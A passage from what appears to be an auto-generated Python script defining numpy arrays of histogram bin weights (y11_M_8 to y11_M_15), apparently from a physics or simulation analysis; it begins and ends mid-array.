32018,8.09672483331e-05,0.000323664024217,0.000242968082573,0.000161716106018,0.0,8.11095102894e-05,0.000161883167949,0.0,8.09353289745e-05,8.12819471194e-05,0.0,8.09917025536e-05,0.0,8.10966231038e-05,8.08337245172e-05,0.0,0.0,0.000162031999227,0.000242803220894,0.0,0.0,8.10674854915e-05,8.12074843323e-05,8.09938713726e-05,0.0,0.0,0.0,0.000162076632894,0.000162257210653,0.0,8.11512364819e-05,0.0,0.0,0.0,0.0,8.12819471194e-05,0.0,0.0,0.0,0.0,8.09776209459e-05,0.0,0.0,0.0,8.09752321017e-05,0.0,0.0,8.09211845025e-05,0.0,8.10323129044e-05,8.12819471194e-05,0.0,0.0,0.0,8.10351575148e-05,0.0,0.0,0.0,0.0,8.1053262439e-05,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.00024253746198,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,8.11095102894e-05,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.000162118437667,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,8.07223132259e-05,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,8.09211845025e-05,0.0,0.0,0.0,0.0,0.0,0.0,8.09353289745e-05,0.0,8.09353289745e-05,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,8.09211845025e-05,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0])
# Creating weights for histo: y11_M_8
y11_M_8_weights = numpy.array([0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.000744750488793,0.00031606157265,0.000851153040779,0.000426169087221,0.000425326731364,0.000319630392978,0.000425990793761,0.00053206721683,0.000106609744353,0.000424260088795,0.00053098359128,0.000319377207357,0.000426359630699,0.000532957125034,0.000319709795374,0.000106683411514,0.000106381838317,0.0,0.000635178522784,0.000425045537745,0.000633459622381,0.000319224193482,0.000319303595878,0.000533150285562,0.0,0.000206924593681,0.000531889535872,0.000319373420987,0.000639106324352,0.000425862168561,0.000213219488707,0.000106312013208,0.000425724021755,0.0,0.000531245073505,0.000212301795233,0.000106490250986,0.0,0.000426194311124,0.000106609744353,0.000106530341957,0.0,0.000213060739596,0.000212763620952,0.000106490250986,0.000105748233922,0.000314394901874,0.000212842355165,0.000319253927619,0.000106490250986,0.000319555500816,0.000319709795374,0.000106312013208,0.000209679734333,0.000106381838317,0.000106490250986,0.0,0.0,0.000106683411514,0.0,0.0,0.0,0.000213100051021,0.000212802264194,0.000106609744353,0.000106609744353,0.00021299158267,0.000106530341957,0.000213219488707,0.000106683411514,0.0,0.0,0.0,0.0,0.0,0.0,0.000106683411514,0.000106312013208,0.000106490250986,0.000106490250986,0.000106683411514,0.0,0.000213213753471,0.0,0.000106683411514,0.000212559268361,0.0,0.0,0.0,0.000319184102511,0.000106609744353,0.0,0.0,0.0,0.0,0.0,0.0,0.000212357978275,0.0,0.000106609744353,0.0,0.000106683411514,0.000106312013208,0.000106530341957,0.0,0.0,0.000106683411514,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.000106683411514,0.000106381838317,0.0,0.0,0.0,0.0,0.0,0.000106683411514,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.000104897748507,0.000106490250986,0.000106609744353,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.000106381838317,0.0,0.0,0.000106312013208,0.000105609363251,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.000106609744353,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.000106312013208,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.000106381838317,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0])
# Creating weights for histo: y11_M_9
y11_M_9_weights = numpy.array([0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0])
# Creating weights for histo: y11_M_10
y11_M_10_weights = numpy.array([0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,3.94542685761,0.0,0.0,0.0,0.0,0.0,3.95485645769,0.0,0.0,3.948593127,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0])
# Creating weights for histo: y11_M_11
y11_M_11_weights = numpy.array([0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,2.59425860808,3.45120407328,0.864634129954,4.31990387508,2.59191408121,0.863198449487,2.59033617284,2.5918060053,1.72706898707,0.864459479274,2.59052782746,2.58684892329,3.4537561059,2.59467073757,1.72795665059,0.0,2.58954938017,3.46022336871,0.0,0.864919594473,0.864704019046,2.59014740024,1.72942648305,2.5899298074,0.0,1.72794079946,0.0,0.0,0.863850651614,2.58957964143,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.863850651614,0.0,0.0,1.72703152075,0.0,0.864244912555,0.0,0.865024356061,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.865320916374,0.0,0.0,0.0,0.0,0.0,0.863198449487,0.862434424812,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.864105998978,0.0,0.0,0.864567266987,0.0,0.0,0.861387385339,0.862982009453,0.862321737657,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.865024356061,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.864823767161,0.0,0.0,0.0,0.862982009453,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.862575644009,0.0,0.0,0.0,0.864634129954,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.862575644009,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0])
# Creating weights for histo: y11_M_12
y11_M_12_weights = numpy.array([0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,1.34896582829,1.86898344739,1.86894161393,2.38869063335,1.03879134187,1.87031202041,1.45374595425,2.07710491676,1.34973037086,0.934535865208,1.34956015194,1.03813513354,1.24601613263,1.03823163901,1.45378057505,0.831075224312,0.830509607066,0.726489407563,0.934591546987,0.935020844851,0.51921643619,0.830804028081,0.623246300665,0.622353516902,0.62320735227,1.1427085445,0.518947548012,0.415275864517,0.311431509804,0.72648450295,0.103848523633,0.311916200941,0.31151748478,0.415230568976,0.415395594768,0.207617015528,0.20732115198,0.103514317555,0.103720066057,0.727052861009,0.31192139406,0.311666209947,0.415670253078,0.311650486336,0.103827477075,0.104014963108,0.207666927175,0.518507575403,0.103826525003,0.208085983053,0.41571165378,0.103644491745,0.103720066057,0.207587587852,0.41599063969,0.519842062815,0.207545177377,0.103848523633,0.208078770387,0.207504497943,0.519833263363,0.103587857894,0.0,0.207784782133,0.311333417551,0.0,0.103848523633,0.0,0.103733294086,0.0,0.0,0.103957247356,0.103651920791,0.207735014739,0.103514317555,0.103966739225,0.0,0.0,0.0,0.0,0.103973980741,0.0,0.103942172885,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.208085117533,0.103957247356,0.103587857894,0.207348848616,0.104111973461,0.0,0.103587857894,0.103811681337,0.0,0.103990151537,0.0,0.103720066057,0.0,0.103643063638,0.0,0.0,0.103827477075,0.0,0.0,0.0,0.207341780204,0.0,0.0,0.103651920791,0.0,0.103848523633,0.103733294086,0.103973129646,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.103857640443,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.104014963108,0.0,0.0,0.0,0.0,0.103761062849,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.103643063638,0.103811681337,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.103514317555,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.103896978322,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.103973980741,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.103848523633,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0])
# Creating weights for histo: y11_M_13
y11_M_13_weights = numpy.array([0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.756346970759,0.453765624568,0.378372164716,0.416029750489,0.377899931471,0.416099390668,0.490899771082,0.339935109612,0.264606283129,0.453461119469,0.378128651669,0.226445057756,0.302663730979,0.453906042839,0.378073121591,0.264763997653,0.491565221688,0.264649523763,0.11351453971,0.378474576745,0.188864098939,0.226753500029,0.113510283921,0.15129087792,0.226959644064,0.151092767539,0.0377751320238,0.0755456668855,0.340275800295,0.0755950522416,0.226987022213,0.0756128719346,0.18887101744,0.113541508211,0.0,0.113362196127,0.0756181063272,0.0756100043978,0.0377751320238,0.113428627397,0.0,0.189087106821,0.0378457052908,0.11314246543,0.113349337728,0.0,0.0755950522416,0.0,0.0378457052908,0.0,0.0756897037145,0.0755977377126,0.0,0.0756937774375,0.0378751771969,0.0,0.0755653527532,0.0377751320238,0.0,0.113382860599,0.113337548966,0.0378875576733,0.0,0.0754677199524,0.0378656870156,0.0,0.0378199202178,0.0378575850862,0.075703290377,0.0755870641034,0.113606619503,0.0378751771969,0.188823088611,0.0756128719346,0.0378457052908,0.0,0.0378575850862,0.0,0.0756128719346,0.0755269368633,0.0,0.0,0.0756986932149,0.0378751771969,0.0,0.0,0.0,0.0376999615946,0.0378656870156,0.0378656870156,0.0,0.0,0.0,0.0,0.0,0.0378738572197,0.0378738572197,0.0,0.0,0.0,0.0,0.0378111355415,0.0,0.0,0.0,0.151322079451,0.0,0.0376688283378,0.0,0.0,0.0,0.0,0.0,0.0378738572197,0.0,0.0,0.0,0.0378875576733,0.037588218692,0.0,0.0,0.037802123283,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0377222874169,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0378738572197,0.0,0.0,0.0376610905401,0.0,0.0,0.0,0.0378738572197,0.0377751320238,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.037588218692,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0756835134764,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0378199202178,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0378751771969,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0378656870156,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0])
# Creating weights for histo: y11_M_14
y11_M_14_weights = numpy.array([0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.190964039793,0.169597734608,0.201653107833,0.201615739522,0.148457803471,0.201531047638,0.201594241923,0.159113543018,0.0954323301437,0.116722326066,0.116760935177,0.190982507529,0.116757905314,0.116780932272,0.0955129822107,0.0743278628317,0.0530953044552,0.0848102653599,0.159123354003,0.106183596942,0.0953661925632,0.063633153476,0.127196620103,0.0318731486082,0.0636903168909,0.106126837509,0.0318439176444,0.0318519828511,0.0954455605454,0.106124572325,0.0318471206424,0.0530263822863,0.0424427101949,0.053074513824,0.116633998346,0.0530612401385,0.0636799432172,0.0530330768407,0.0530580082847,0.0106140515176,0.0424617550479,0.0318659057929,0.0212528728864,0.0955286220748,0.042423997184,0.0636930870513,0.0106015641537,0.0212211891764,0.0105821456176,0.0424380066933,0.021214321487,0.031813546875,0.0212102960976,0.0318212369558,0.0318128543349,0.0212004129731,0.0212118687407,0.0318383484677,0.0318601779091,0.031838997724,0.0212179717505,0.0211761019296,0.0212312598638,0.0106129549957,0.0212269026323,0.0212239593368,0.0212042219437,0.0212083483285,0.0106358549887,0.0211853790815,0.010603038687,0.0105803536701,0.0211871681435,0.0212512281037,0.0105942592983,0.0106358549887,0.0106129549957,0.0106161680933,0.0318525888237,0.0,0.0106200564174,0.0,0.0106015641537,0.0105969760755,0.0318390265799,0.0318308603778,0.0106140515176,0.0,0.0106079629358,0.0106130285781,0.0106200564174,0.0212117533174,0.0106358549887,0.0106079629358,0.0,0.0105954005467,0.0,0.0317777079243,0.010603038687,0.0106140515176,0.0105880480792,0.0,0.0106163599846,0.0,0.0,0.0,0.0106129549957,0.0,0.0,0.0,0.0,0.0105942592983,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0106099107048,0.01058841022,0.0,0.0,0.0,0.0105969760755,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.010603038687,0.0,0.0,0.0106050196403,0.021233727038,0.0,0.0106163599846,0.0106200564174,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0105969760755,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0105880480792,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0106290507821,0.0106131339019,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0106130285781,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0105803536701,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0])
# Creating weights for histo: y11_M_15
y11_M_15_weights = numpy.array([0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0227754472451,0.0114364412895,0.00570356146684,0.0114648244717,0.00565686040638,0.0114096758245,0.00575000989748,0.00569557038665,0.00570610992558,0.0,0.0,0.0227551748098,0.0228405991468,0.0115222157626,0.0114107927143,0.0,0.00567245254178,0.00570356146684,0.0114068703039,0.0,0.0,0.00579528825314,0.00571859958947,0.0114194264493,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0114668721029,0.0,0.00567932673223,0.00576110788128,0.0171053525816,0.0,0.0,0.0,0.0115635938683,0.00570977527407,0.0,0.0,0.00570610992558,0.0,0.0,0.00570723124743,0.00569557038665,0.0114618416669,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0172332364573,0.0,0.0,0.0,0.0,0.0170501995024,0.0,0.0,0.0,0.0,0.0,0.0,0.00571686220542,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.00572416630978,0.0,0.0,0.0,0.0,0.00568977762912,0.0,0.00574324207748,0.0,0.0,0.0114251660216,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.00567245254178,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.00567245254178,0.0,0.0,0.00567245254178,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.